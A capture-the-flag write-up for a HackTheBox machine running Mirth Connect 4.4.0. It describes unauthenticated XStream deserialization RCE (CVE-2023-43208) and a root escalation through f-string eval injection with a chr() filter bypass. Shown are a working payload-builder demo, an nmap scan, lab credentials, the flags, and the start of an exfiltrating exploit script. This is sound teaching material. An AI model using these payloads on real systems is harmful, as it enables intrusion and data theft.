
Interpreter (Mirth Connect → f-string Injection) — HackTheBox

Task: HackTheBox machine running the Mirth Connect 4.4.0 healthcare integration engine. Solution: CVE-2023-43208 (XStream deserialization) for initial RCE as the mirth user, then privilege escalation through a Python f-string double-eval injection in an internal Flask service running as root, using chr() encoding to get past its regex filter.

Techniques

  • xstream_deserialization_rce
  • fstring_double_eval
  • chr_bypass_regex
  • base64_command_exfiltration
  • wget_post_file_exfil
  • internal_service_abuse
  • xml_injection_to_eval



Description

Full machine on HackTheBox. Mirth Connect 4.4.0 (healthcare integration engine) vulnerable to CVE-2023-43208 for initial access, then privilege escalation via Python f-string injection in an internal Flask service running as root.

  • Target: 10.129.7.17
  • OS: Debian 12, kernel 6.1.0-43-amd64
  • Stack: Jetty (Mirth Connect 4.4.0), Flask/Werkzeug 2.2.2, MariaDB 10.5
  • Users: root, sedric (uid=1000), mirth (uid=103)

Flags

#  Type  Flag                              Method
1  User  b63665586c7eca1656d9f9b6b821e48a  f-string injection → open('/home/sedric/user.txt').read()
2  Root  9acc749ecf629eb2fa239153b8e2cacd  f-string injection → open('/root/root.txt').read()
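The privilege-escalation primitive named in the Method column, as an added example that is not code from the original writeup or from the machine's notif.py. A plain function stands in for the Flask route, and the denylist regex (quotes and slashes) is an assumption, since the page does not show the real filter. The pattern generalises beyond this box: whenever caller text is spliced into an f-string that is then passed to eval(), every {...} in that text is evaluated as a Python expression, and chr() rebuilds any string the filter forbids. The hardened renderer beside it substitutes from an explicit mapping and never evaluates anything.

```python
import os
import re
import string
import tempfile

# Assumed filter: the page says chr() encoding bypassed "a regex filter" but
# does not show it, so this denylist (quotes and slashes) is a hypothetical
# stand-in, not the real notif.py pattern.
DENYLIST = re.compile(r"['\"/]")


def render_notification(template: str, user: str) -> str:
    """Hypothetical vulnerable handler modelled on the page's description.

    Double eval: the outer f-string pastes the caller's template into Python
    source text, then eval() compiles that text as an f-string, so every {...}
    in the attacker's input runs as a Python expression. Because the globals
    dict has no __builtins__ key, eval() inserts the real builtins, so open()
    and chr() are reachable from the payload.
    """
    if DENYLIST.search(template):
        raise ValueError("blocked by filter")
    return eval(f'f"""{template}"""', {"user": user})


def render_notification_safe(template: str, user: str) -> str:
    """Hardened form: string.Template substitutes only $identifiers from an
    explicit mapping and never evaluates anything in the template."""
    return string.Template(template).safe_substitute(user=user)


def chr_encode(s: str) -> str:
    """Rebuild s at runtime from chr() calls so the payload contains no quote
    or slash characters: 'ab' -> 'chr(97)+chr(98)'."""
    return "+".join(f"chr({ord(c)})" for c in s)


def build_read_payload(path: str) -> str:
    """{open(<chr-encoded path>).read()} - the shape used for user.txt and
    root.txt on the box, here pointed at an arbitrary path."""
    return f"{{open({chr_encode(path)}).read()}}"


def demo() -> dict:
    """Run the benign, blocked, bypass and hardened cases against a constructed
    secret file (stands in for /home/sedric/user.txt) and return the results."""
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as fh:
        fh.write("constructed-secret-flag\n")  # constructed sample, not a real flag
        secret_path = fh.name
    results = {}
    try:
        # 1. Intended use: {user} is substituted by the f-string.
        results["benign"] = render_notification("Hello {user}", "sedric")
        # 2. Naive payload with quotes and slashes is caught by the regex.
        try:
            render_notification("{open('" + secret_path + "').read()}", "sedric")
            results["quoted_blocked"] = False
        except ValueError:
            results["quoted_blocked"] = True
        # 3. chr()-encoded payload gives the regex nothing to match on.
        payload = build_read_payload(secret_path)
        results["payload_filtered"] = bool(DENYLIST.search(payload))
        results["leaked"] = render_notification(payload, "sedric").strip()
        # 4. The hardened renderer returns the same payload as inert text.
        results["safe_payload"] = render_notification_safe(payload, "sedric")
        results["safe_benign"] = render_notification_safe("Hello $user", "sedric")
    finally:
        os.unlink(secret_path)
    return results


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The check worth taking away: a denylist on characters cannot contain eval(), because chr(), getattr() and __import__() let the payload manufacture any string or object at runtime. The only fix is to stop evaluating caller-controlled text, as the string.Template variant does.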

Reconnaissance

Nmap Scan

nmap -sV -sC -T4 -p- --min-rate=1000 10.129.7.17

Open ports:

  • 22 — SSH (OpenSSH 9.2p1 Debian)
  • 53 — DNS
  • 80/443 — HTTP/HTTPS (Jetty — Mirth Connect Administrator 4.4.0)
  • 6661 — Mirth TCP/HL7 Listener (MLLP protocol)

Internal services (discovered after initial access):

  • 127.0.0.1:54321 — Flask/Werkzeug 2.2.2 (notif.py, runs as root)
  • 127.0.0.1:3306 — MariaDB (credentials: mirthdb:MirthPass123!)

Identification

  • HTTP title: "Mirth Connect Administrator"
  • SSL cert CN: mirth-connect
  • Mirth Connect — open-source healthcare integration engine for routing HL7 messages
  • Version 4.4.0 is vulnerable to CVE-2023-43208 (pre-auth RCE)

Step 1: Initial Access — CVE-2023-43208 (XStream Deserialization RCE)

Mirth Connect 4.4.0 is affected by CVE-2023-43208, a critical unauthenticated RCE (patched in 4.4.1): XML posted to the /api/users endpoint is deserialized by XStream before any authentication check.

Vulnerability

  • Endpoint /api/users accepts XML without authentication
  • XStream parser deserializes arbitrary Java objects
  • Gadget chain: ChainedTransformer + InvokerTransformer + EventUtils$EventBindingInvocationHandler
  • Result: Runtime.getRuntime().exec(command) as user mirth

Exploit (rce.py)

#!/usr/bin/env python3
"""CVE-2023-43208 RCE helper - executes commands and exfiltrates output"""
import requests
import urllib3
import sys
import time
import threading
import base64 as b64
from http.server import HTTPServer, BaseHTTPRequestHandler

urllib3.disable_warnings()
...
